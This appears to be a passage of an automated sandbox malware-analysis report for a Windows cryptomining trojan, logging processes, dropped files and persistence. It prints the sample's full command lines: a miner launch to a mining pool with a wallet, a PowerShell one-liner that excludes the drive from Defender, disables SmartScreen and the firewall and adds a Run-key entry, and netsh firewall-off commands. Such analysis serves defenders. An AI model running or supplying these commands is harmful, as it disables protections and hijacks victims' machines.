      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\ProgramData\Systemd\mvsc32.exe --url pool.hashvault.pro:80 --user 49QjFe3jmGzJUr9K1Uoax1gay6mESvcFjACYJVMPATBWWV5DJdoD4qgeQD3JrtmtqZJgDmHP1nvagRP3QRTZXUPWHP9F4cx --pass x
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM mvsc32.exe /F && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit
      Source: C:\ProgramData\UpSys.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mvsc32.exe /F
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\UpSys.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
      Source: C:\ProgramData\UpSys.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6524 -s 1860
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7004 -s 2508
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
      Source: C:\ProgramData\UpSys.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
      Source: C:\ProgramData\UpSys.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
      Source: C:\ProgramData\UpSys.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\ProgramData\Systemd\mvsc32.exe --url pool.hashvault.pro:80 --user 49QjFe3jmGzJUr9K1Uoax1gay6mESvcFjACYJVMPATBWWV5DJdoD4qgeQD3JrtmtqZJgDmHP1nvagRP3QRTZXUPWHP9F4cx --pass xJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM mvsc32.exe /F && exitJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exitJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM mvsc32.exe /F && exitJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\ProgramData\Systemd\mvsc32.exe --url pool.hashvault.pro:80 --user 49QjFe3jmGzJUr9K1Uoax1gay6mESvcFjACYJVMPATBWWV5DJdoD4qgeQD3JrtmtqZJgDmHP1nvagRP3QRTZXUPWHP9F4cx --pass xJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM mvsc32.exe /F && exitJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exitJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state offJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Jump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\ProgramData\Systemd\mvsc32.exe --url pool.hashvault.pro:80 --user 49QjFe3jmGzJUr9K1Uoax1gay6mESvcFjACYJVMPATBWWV5DJdoD4qgeQD3JrtmtqZJgDmHP1nvagRP3QRTZXUPWHP9F4cx --pass xJump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mvsc32.exe /F Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mvsc32.exe /F
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mvsc32.exe /F
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\ProgramData\UpSys.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      Source: C:\ProgramData\UpSys.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
      Source: exe.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\ProgramData\MicrosoftNetwork\System.exe
      Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "mvsc32.exe")
      Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "mvsc32.exe")
      Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "mvsc32.exe")
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\9DRWB5QP.txtJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gs3c2uim.ptv.ps1Jump to behavior
      Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@117/47@5/4
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1696:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5656:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3272:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6812:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6904:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3244:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2592:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6180:120:WilError_01
      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7004
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5392:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1980:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3352:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:204:120:WilError_01
      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6524
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_01
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadlineHistoryFile_169209511
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\ProgramData\MicrosoftNetwork\System.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: bQQHP9ciRL.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: bQQHP9ciRL.exeStatic file information: File size 3574272 > 1048576
      Source: bQQHP9ciRL.exeStatic PE information: Raw size of .gPNi is bigger than: 0x100000 < 0x367a00
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFEBCB23417 push esp; retf 2_2_00007FFEBCB23418
      Source: bQQHP9ciRL.exeStatic PE information: section name: _RDATA
      Source: bQQHP9ciRL.exeStatic PE information: section name: .[UG9j
      Source: bQQHP9ciRL.exeStatic PE information: section name: .:&C@J
      Source: bQQHP9ciRL.exeStatic PE information: section name: .gPNi
      Source: mvsc32.exe.0.drStatic PE information: section name: .xdata
      Source: System.exe.0.drStatic PE information: section name: _RDATA
      Source: System.exe.0.drStatic PE information: section name: .[UG9j
      Source: System.exe.0.drStatic PE information: section name: .:&C@J
      Source: System.exe.0.drStatic PE information: section name: .gPNi
      Source: initial sampleStatic PE information: section where entry point is pointing to: .gPNi

      Persistence and Installation Behavior

      barindex
      Creates files in the system32 config directory
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeFile created: C:\ProgramData\MicrosoftNetwork\System.exeJump to dropped file
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeFile created: C:\ProgramData\Systemd\old.exe (copy)Jump to dropped file
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeFile created: C:\ProgramData\Systemd\mvsc32.exeJump to dropped file
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeFile created: C:\ProgramData\UpSys.exeJump to dropped file
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeFile created: C:\ProgramData\MicrosoftNetwork\System.exeJump to dropped file
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeFile created: C:\ProgramData\Systemd\old.exe (copy)Jump to dropped file
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeFile created: C:\ProgramData\Systemd\mvsc32.exeJump to dropped file
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\UpSys[1].exeJump to dropped file
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeFile created: C:\ProgramData\UpSys.exeJump to dropped file
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnkJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\20220715
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\20220715\PowerShell_transcript.287400.089iPmed.20220715040009.txt
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\mpssvcJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnkJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
